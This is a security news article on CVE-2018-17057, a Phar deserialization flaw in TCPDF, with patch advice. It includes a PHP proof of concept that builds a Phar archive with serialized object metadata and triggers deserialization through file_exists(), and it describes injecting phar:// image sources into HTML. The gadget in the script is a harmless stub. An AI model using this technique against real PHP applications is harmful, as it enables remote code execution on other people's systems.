Critical vulnerability in a popular PHP library

An ethical hacker from the International Institute of Cyber Security reports the discovery of a critical security vulnerability in TCPDF, one of the most widely used PHP libraries for generating PDF files.

According to the ethical hacker, the vulnerability could be exploited by malicious users to achieve remote code execution in websites and applications that use this library; an attacker could then run arbitrary code and take control of the compromised system.

This vulnerability is a variant of an earlier discovery. The original technique was presented by security researcher Sam Thomas about a year ago: he demonstrated that PHP's phar:// stream wrapper deserializes the metadata stored in a Phar archive whenever an ordinary filesystem function (file_exists, fopen, getimagesize and the like) is given a phar:// path, turning routine file operations in PHP applications into unserialize() calls on attacker-controlled data.

According to reports, the new variant can be exploited in two ways:

  • When a website lets user-supplied data (for example a file path or image reference) become part of the PDF generation process
  • When a website has an XSS or HTML injection flaw that lets an attacker place markup, such as an <img> tag with a phar:// source, into the HTML that is later handed to TCPDF (for instance through writeHTML) to be converted to PDF

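The script below is an added example, not TCPDF's code and not part of the original report. It shows the primitive behind both paths above: an attacker stores a serialized object in the metadata of a Phar archive, and the victim's only mistake is to call file_exists() on a path the attacker chose. The class name GadgetStub, the helper isPlainLocalPath and the file name demo.phar are assumptions made for the demonstration; the check is ours, not the fix TCPDF shipped. It assumes PHP 7.x: from PHP 8.0 on, Phar metadata is no longer unserialized when an archive is merely opened, only when Phar::getMetadata() is called.

```php
<?php
// Added demonstration (not TCPDF code): a phar:// path turns an ordinary
// filesystem check such as file_exists() into unserialize() of data stored
// by the attacker in the archive's metadata. TCPDF's image handling probes
// the path it is given with such functions, which is why an attacker-chosen
// image path, or an injected <img src="phar://...">, was enough.
//
// Assumptions: PHP 7.x (PHP 8.0+ only unserializes metadata on getMetadata());
// class, function and file names below are ours.
//
//   php -d phar.readonly=0 phar_demo.php build     # attacker side
//   php phar_demo.php trigger                      # victim side
//
// Two separate processes on purpose: an archive created in the current
// process is already cached, so reopening it would not re-parse metadata.

// Stand-in for a gadget class that the target application autoloads. Real
// chains use classes from the application or its dependencies; this one
// only proves that a magic method ran as a side effect of file_exists().
class GadgetStub
{
    public $note = '';

    public function __wakeup()
    {
        echo "GadgetStub::__wakeup() executed, note = {$this->note}\n";
    }
}

// Defensive check (ours, not TCPDF's): accept only plain local paths before
// they reach file_exists()/fopen()/getimagesize(). Wrapper names are
// case-insensitive, so "PHAR://" must be rejected as well; rejecting every
// "scheme://" prefix also covers data://, compress.zlib:// and friends.
function isPlainLocalPath(string $path): bool
{
    return preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path) !== 1;
}

$pharPath = sys_get_temp_dir() . '/demo.phar';   // new Phar() requires ".phar"
$mode = $argv[1] ?? '';

if ($mode === 'build') {
    // Attacker side: the Phar class writes a valid manifest and signature
    // for us, and serialize()s whatever object we pass to setMetadata().
    @unlink($pharPath);
    $phar = new Phar($pharPath);                    // needs phar.readonly=0
    $phar->startBuffering();
    $phar->addFromString('pixel.gif', 'GIF89a');    // archive must hold a file
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $payload = new GadgetStub();
    $payload->note = 'stored by the build step';
    $phar->setMetadata($payload);
    $phar->stopBuffering();
    echo "wrote $pharPath\n";
} elseif ($mode === 'trigger') {
    // Victim side: what a vulnerable consumer does with a user-supplied
    // "image path". Nothing here calls unserialize() explicitly.
    $userPath = 'phar://' . $pharPath . '/pixel.gif';

    if (!isPlainLocalPath($userPath)) {
        echo "hardened check would reject: $userPath\n";
    }

    $exists = file_exists($userPath);   // <-- metadata is unserialized here (PHP 7.x)
    echo 'file_exists returned ' . var_export($exists, true) . "\n";
} else {
    fwrite(STDERR, "usage: php -d phar.readonly=0 phar_demo.php build | php phar_demo.php trigger\n");
    exit(1);
}
```

Run the build step first, then the trigger step; on PHP 7.x the second run prints the __wakeup() line before the file_exists result, even though the victim code never mentions unserialize(). Two practical points follow from this: the phar:// wrapper does not care about the file extension, so the archive can arrive through any upload that accepts images, and in the XSS path the same phar:// string simply sits in the src attribute of an <img> tag inside HTML that the application passes to TCPDF, which resolves the image path with the same kind of filesystem call.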
Exploitation is not trivial and requires solid PHP knowledge: the attacker must get a Phar archive onto the target server and needs a "gadget chain", classes already loaded by the application whose magic methods (__wakeup, __destruct and similar) do something useful when an attacker-controlled object is deserialized. According to experts, deserialization flaws are hard to spot in code review, and in languages such as Ruby, Java and PHP they typically end in full code execution.

TCPDF's developers were informed of the vulnerability (tracked as CVE-2018-17057) in August of last year. A month later, TCPDF 6.2.20 was released with a fix. However, users are advised to update to version 6.2.22 or later, because the fix was inadvertently disabled by a later change that addressed a different vulnerability.

TCPDF is one of the most popular PHP libraries in use today, found in independent websites, content management systems, intranets and web applications that generate or process PDF files.

This is a further reminder that patching a vulnerability is not a simple task: a fix can be undone by an unrelated change, and in some cases large portions of code must be rewritten, not just a few fragments.